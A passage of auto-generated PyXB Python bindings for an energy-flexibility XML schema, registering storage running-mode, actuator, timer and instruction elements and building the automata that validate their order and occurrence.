StorageContinuousRunningModeData._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'gasFlowRate'), pyxb.binding.datatypes.double, scope=StorageContinuousRunningModeData, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 611, 3)))
StorageContinuousRunningModeData._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'heatTemperature'), pyxb.binding.datatypes.double, scope=StorageContinuousRunningModeData, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 612, 3)))
StorageContinuousRunningModeData._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'heatFlowRate'), pyxb.binding.datatypes.double, scope=StorageContinuousRunningModeData, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 613, 3)))
StorageContinuousRunningModeData._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'heatThermalPower'), pyxb.binding.datatypes.double, scope=StorageContinuousRunningModeData, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 614, 3)))
def _BuildAutomaton_26 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_26
del _BuildAutomaton_26
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 609, 3))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 610, 3))
counters.add(cc_1)
cc_2 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 611, 3))
counters.add(cc_2)
cc_3 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 612, 3))
counters.add(cc_3)
cc_4 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 613, 3))
counters.add(cc_4)
cc_5 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 614, 3))
counters.add(cc_5)
states = []
final_update = set()
symbol = pyxb.binding.content.ElementUse(StorageContinuousRunningModeData._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'fillingRate')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 608, 3))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(StorageContinuousRunningModeData._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'runningCost')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 609, 3))
st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(StorageContinuousRunningModeData._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'electricalPower')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 610, 3))
st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_2, False))
symbol = pyxb.binding.content.ElementUse(StorageContinuousRunningModeData._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'gasFlowRate')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 611, 3))
st_3 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_3, False))
symbol = pyxb.binding.content.ElementUse(StorageContinuousRunningModeData._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'heatTemperature')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 612, 3))
st_4 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_4)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_4, False))
symbol = pyxb.binding.content.ElementUse(StorageContinuousRunningModeData._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'heatFlowRate')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 613, 3))
st_5 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_5)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_5, False))
symbol = pyxb.binding.content.ElementUse(StorageContinuousRunningModeData._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'heatThermalPower')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 614, 3))
st_6 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_6)
transitions = []
transitions.append(fac.Transition(st_1, [
]))
transitions.append(fac.Transition(st_2, [
]))
transitions.append(fac.Transition(st_3, [
]))
transitions.append(fac.Transition(st_4, [
]))
transitions.append(fac.Transition(st_5, [
]))
transitions.append(fac.Transition(st_6, [
]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_0, False) ]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_1, False) ]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_2, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_2, False) ]))
st_3._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_3, True) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_3, False) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_3, False) ]))
st_4._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_4, True) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_4, False) ]))
st_5._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_5, True) ]))
st_6._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
StorageContinuousRunningModeData._Automaton = _BuildAutomaton_26()
StorageRunningModes._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'discreteRunningMode'), StorageDiscreteRunningMode, scope=StorageRunningModes, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 652, 4)))
StorageRunningModes._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'continuousRunningMode'), StorageContinuousRunningMode, scope=StorageRunningModes, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 653, 4)))
def _BuildAutomaton_27 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_27
del _BuildAutomaton_27
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = set()
symbol = pyxb.binding.content.ElementUse(StorageRunningModes._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'discreteRunningMode')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 652, 4))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
symbol = pyxb.binding.content.ElementUse(StorageRunningModes._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'continuousRunningMode')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 653, 4))
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
transitions = []
transitions.append(fac.Transition(st_0, [
]))
transitions.append(fac.Transition(st_1, [
]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_0, [
]))
transitions.append(fac.Transition(st_1, [
]))
st_1._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
StorageRunningModes._Automaton = _BuildAutomaton_27()
ActuatorBehaviour._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'runningModes'), StorageRunningModes, scope=ActuatorBehaviour, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 659, 3)))
ActuatorBehaviour._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'timers'), Timers, scope=ActuatorBehaviour, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 660, 3)))
ActuatorBehaviour._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'transitions'), Transitions, scope=ActuatorBehaviour, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 661, 3)))
def _BuildAutomaton_28 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_28
del _BuildAutomaton_28
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 660, 3))
counters.add(cc_0)
states = []
final_update = None
symbol = pyxb.binding.content.ElementUse(ActuatorBehaviour._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'runningModes')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 659, 3))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = None
symbol = pyxb.binding.content.ElementUse(ActuatorBehaviour._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'timers')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 660, 3))
st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = set()
symbol = pyxb.binding.content.ElementUse(ActuatorBehaviour._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'transitions')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 661, 3))
st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
transitions = []
transitions.append(fac.Transition(st_1, [
]))
transitions.append(fac.Transition(st_2, [
]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, False) ]))
st_1._set_transitionSet(transitions)
transitions = []
st_2._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
ActuatorBehaviour._Automaton = _BuildAutomaton_28()
LeakageFunction._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'leakageElement'), LeakageElement, scope=LeakageFunction, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 672, 3)))
def _BuildAutomaton_29 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_29
del _BuildAutomaton_29
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = set()
symbol = pyxb.binding.content.ElementUse(LeakageFunction._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'leakageElement')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 672, 3))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
LeakageFunction._Automaton = _BuildAutomaton_29()
ActuatorBehaviours._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'actuatorBehaviour'), ActuatorBehaviour, scope=ActuatorBehaviours, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 677, 3)))
def _BuildAutomaton_30 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_30
del _BuildAutomaton_30
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = set()
symbol = pyxb.binding.content.ElementUse(ActuatorBehaviours._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'actuatorBehaviour')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 677, 3))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
ActuatorBehaviours._Automaton = _BuildAutomaton_30()
TimerUpdate._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'finishedAt'), pyxb.binding.datatypes.dateTime, scope=TimerUpdate, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 699, 3)))
def _BuildAutomaton_31 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_31
del _BuildAutomaton_31
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = set()
symbol = pyxb.binding.content.ElementUse(TimerUpdate._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'finishedAt')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 699, 3))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
TimerUpdate._Automaton = _BuildAutomaton_31()
TimerUpdates._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'timerUpdate'), TimerUpdate, scope=TimerUpdates, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 705, 3)))
def _BuildAutomaton_32 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_32
del _BuildAutomaton_32
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 705, 3))
counters.add(cc_0)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(TimerUpdates._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'timerUpdate')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 705, 3))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
TimerUpdates._Automaton = _BuildAutomaton_32()
ActuatorStatus._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'currentRunningMode'), pyxb.binding.datatypes.int, scope=ActuatorStatus, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 710, 3)))
ActuatorStatus._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'runningModeFactor'), STD_ANON, scope=ActuatorStatus, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 711, 3)))
ActuatorStatus._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'previousRunningModeId'), pyxb.binding.datatypes.int, scope=ActuatorStatus, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 719, 3)))
ActuatorStatus._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'transitionTimestamp'), pyxb.binding.datatypes.dateTime, scope=ActuatorStatus, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 720, 3)))
ActuatorStatus._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'timerUpdates'), TimerUpdates, scope=ActuatorStatus, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 721, 3)))
def _BuildAutomaton_33 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_33
del _BuildAutomaton_33
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 711, 3))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 719, 3))
counters.add(cc_1)
cc_2 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 720, 3))
counters.add(cc_2)
cc_3 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 721, 3))
counters.add(cc_3)
states = []
final_update = set()
symbol = pyxb.binding.content.ElementUse(ActuatorStatus._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'currentRunningMode')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 710, 3))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(ActuatorStatus._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'runningModeFactor')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 711, 3))
st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(ActuatorStatus._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'previousRunningModeId')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 719, 3))
st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_2, False))
symbol = pyxb.binding.content.ElementUse(ActuatorStatus._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'transitionTimestamp')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 720, 3))
st_3 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_3, False))
symbol = pyxb.binding.content.ElementUse(ActuatorStatus._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'timerUpdates')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 721, 3))
st_4 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_4)
transitions = []
transitions.append(fac.Transition(st_1, [
]))
transitions.append(fac.Transition(st_2, [
]))
transitions.append(fac.Transition(st_3, [
]))
transitions.append(fac.Transition(st_4, [
]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, False) ]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_1, False) ]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_2, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_2, False) ]))
st_3._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_3, True) ]))
st_4._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
ActuatorStatus._Automaton = _BuildAutomaton_33()
ActuatorStatuses._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'actuatorStatus'), ActuatorStatus, scope=ActuatorStatuses, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 727, 3)))
def _BuildAutomaton_34 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_34
del _BuildAutomaton_34
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = set()
symbol = pyxb.binding.content.ElementUse(ActuatorStatuses._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'actuatorStatus')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 727, 3))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
ActuatorStatuses._Automaton = _BuildAutomaton_34()
TargetProfile._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'element'), CTD_ANON_10, scope=TargetProfile, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 744, 3)))
def _BuildAutomaton_35 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_35
del _BuildAutomaton_35
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = set()
symbol = pyxb.binding.content.ElementUse(TargetProfile._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'element')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 744, 3))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
TargetProfile._Automaton = _BuildAutomaton_35()
CTD_ANON_11._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'usageProfile'), StorageUsageProfile, scope=CTD_ANON_11, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 772, 9)))
CTD_ANON_11._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'usageProbabilityProfile'), StorageUsageProbabilityProfile, scope=CTD_ANON_11, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 773, 9)))
def _BuildAutomaton_36 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_36
del _BuildAutomaton_36
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = set()
symbol = pyxb.binding.content.ElementUse(CTD_ANON_11._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'usageProfile')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 772, 9))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
symbol = pyxb.binding.content.ElementUse(CTD_ANON_11._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'usageProbabilityProfile')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 773, 9))
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
transitions = []
st_0._set_transitionSet(transitions)
transitions = []
st_1._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
CTD_ANON_11._Automaton = _BuildAutomaton_36()
ActuatorInstruction._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'runningModeId'), pyxb.binding.datatypes.int, scope=ActuatorInstruction, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 784, 3)))
ActuatorInstruction._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'runningModeFactor'), STD_ANON_, scope=ActuatorInstruction, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 785, 3)))
ActuatorInstruction._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'startTime'), pyxb.binding.datatypes.dateTime, scope=ActuatorInstruction, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 793, 3)))
def _BuildAutomaton_37 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_37
del _BuildAutomaton_37
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 785, 3))
counters.add(cc_0)
states = []
final_update = None
symbol = pyxb.binding.content.ElementUse(ActuatorInstruction._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'runningModeId')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 784, 3))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = None
symbol = pyxb.binding.content.ElementUse(ActuatorInstruction._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'runningModeFactor')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 785, 3))
st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = set()
symbol = pyxb.binding.content.ElementUse(ActuatorInstruction._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'startTime')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 793, 3))
st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
transitions = []
transitions.append(fac.Transition(st_1, [
]))
transitions.append(fac.Transition(st_2, [
]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, False) ]))
st_1._set_transitionSet(transitions)
transitions = []
st_2._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
ActuatorInstruction._Automaton = _BuildAutomaton_37()
ActuatorInstructions._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'actuatorInstruction'), ActuatorInstruction, scope=ActuatorInstructions, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 799, 3)))
def _BuildAutomaton_38 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_38
del _BuildAutomaton_38
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = set()
symbol = pyxb.binding.content.ElementUse(ActuatorInstructions._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'actuatorInstruction')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 799, 3))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
ActuatorInstructions._Automaton = _BuildAutomaton_38()
